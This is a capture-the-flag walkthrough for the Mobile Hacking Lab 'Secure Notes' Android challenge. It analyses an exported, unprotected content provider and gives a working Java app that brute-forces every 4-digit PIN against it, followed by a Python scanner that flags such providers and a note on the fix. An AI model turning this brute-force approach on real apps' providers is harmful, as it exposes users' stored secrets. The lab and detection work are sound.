[Walkthrough] Mobile Hacking Lab — Secure Note


Md.Karimul Islam Shezan

Mobile Hacking Lab: Secure Notes

Objective:

Retrieve a PIN code from a secured content provider in an Android application.

APP UI:

This is the app’s first screen.

Here we can see that it accepts a PIN of at most four digits and shows an error when the wrong PIN is entered. To solve this challenge, we have to find the correct PIN.

Let’s open the app in jadx to understand how it works.

Decompile the app:

After decompiling the app’s source code we can see that it has one activity (MainActivity) and one content provider that is exported without any permission defined for it in AndroidManifest.xml. That means any application on the device can query data from this provider. Let’s take a look at the MainActivity first.

Digging into MainActivity:

Inside the onCreate() method there is an on-click listener on the submit button. It takes the PIN we entered and calls “querySecretProvider(enteredpin)” with that value as its argument.

Let’s explore this method:

Here we can see that querySecretProvider receives our entered PIN in its pin parameter, builds a selection string by appending the PIN to “pin=”, and then queries the provider at the URI content://com.mobilehackinglab.securenotes.secretprovider. It then checks whether the returned value is null; if it is not null, it prints the returned data on screen.

Now, let’s inspect the exported SecretDataProvider content provider:

Inside its onCreate() method it:

Reads the config.properties file stored in the application’s assets folder. The base64-encoded values read from that file are decoded and used to initialise the class variables encryptedSecret, salt and iv. The iterationCount variable is also initialised from a value in config.properties.

When we query a data from this content provider the query method runs.

1. It takes our entered PIN from the selection argument and checks that it is not null and that it starts with the string “pin=”.

2. It removes the “pin=” prefix from the selection. For example, if selection is "pin=1234", after executing this line of code removePrefix will contain "1234".

3. It calls the decryptSecret() method with the 4-digit PIN obtained in the previous step.

decryptSecret() :

Here we see that the PIN is used as the decryption key.

Here I’m writing a small app to exploit this vulnerability:

package com.provider.poc;

import androidx.appcompat.app.AppCompatActivity;

import android.content.ContentResolver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends AppCompatActivity {

    // Authority of the exported SecretDataProvider, taken from the decompiled app.
    private static final Uri SECRET_URI =
            Uri.parse("content://com.mobilehackinglab.securenotes.secretprovider");

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        ContentResolver resolver = getContentResolver();
        // Try every 4-digit PIN; the provider expects the selection as "pin=NNNN".
        for (int i = 0; i < 10000; i++) {
            String selection = "pin=" + String.format("%04d", i);
            Cursor cursor = resolver.query(SECRET_URI, null, selection, null, null);
            if (cursor == null) {
                continue;
            }
            try {
                // Column 1 holds the value the provider returns for this PIN.
                while (cursor.moveToNext()) {
                    String result = cursor.getString(1);
                    Log.d("Secret_Pin", i + " : " + result);
                }
            } finally {
                cursor.close();
            }
        }
    }
}
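The root cause is the provider being exported with no permission attached, as noted in the manifest section. As an added check (not part of the original post or the challenge app), the script below parses a constructed AndroidManifest.xml and reports providers that any app could query; the package name and authorities in it are made up for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest (not the challenge app's real manifest): one provider
# exported with no permission, one exported but permission-gated, one not exported.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <application>
    <provider android:name=".SecretDataProvider"
        android:authorities="com.example.notes.secretprovider"
        android:exported="true" />
    <provider android:name=".GuardedProvider"
        android:authorities="com.example.notes.guarded"
        android:exported="true"
        android:readPermission="com.example.notes.permission.READ_SECRET" />
    <provider android:name=".InternalProvider"
        android:authorities="com.example.notes.internal"
        android:exported="false" />
  </application>
</manifest>"""

PERMISSION_ATTRS = ("permission", "readPermission", "writePermission")


def unguarded_exported_providers(manifest_xml):
    """Return (authority, reason) for providers reachable by any app with no permission gate.

    A provider is reported when android:exported="true" and none of android:permission,
    readPermission or writePermission is set. A provider with no android:exported
    attribute is reported too, because it defaults to exported on minSdkVersion < 17;
    confirm the app's minSdk before treating that finding as real.
    """
    root = ET.fromstring(manifest_xml)
    findings = []
    for provider in root.iter("provider"):
        authority = provider.get(ANDROID_NS + "authorities")
        exported = provider.get(ANDROID_NS + "exported")
        guarded = any(provider.get(ANDROID_NS + attr) for attr in PERMISSION_ATTRS)
        if exported == "true" and not guarded:
            findings.append((authority, "exported, no permission"))
        elif exported is None and not guarded:
            findings.append((authority, "exported attribute missing (default true below API 17)"))
    return findings


if __name__ == "__main__":
    for authority, reason in unguarded_exported_providers(SAMPLE_MANIFEST):
        print(f"{authority}: {reason}")
```

The fix for the flagged provider is either android:exported="false" or a permission attribute such as android:readPermission, which the second provider in the sample shows.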

Thanks for reading till the end; see you in the next article.

Linkedin: https://www.linkedin.com/in/sh3zan/
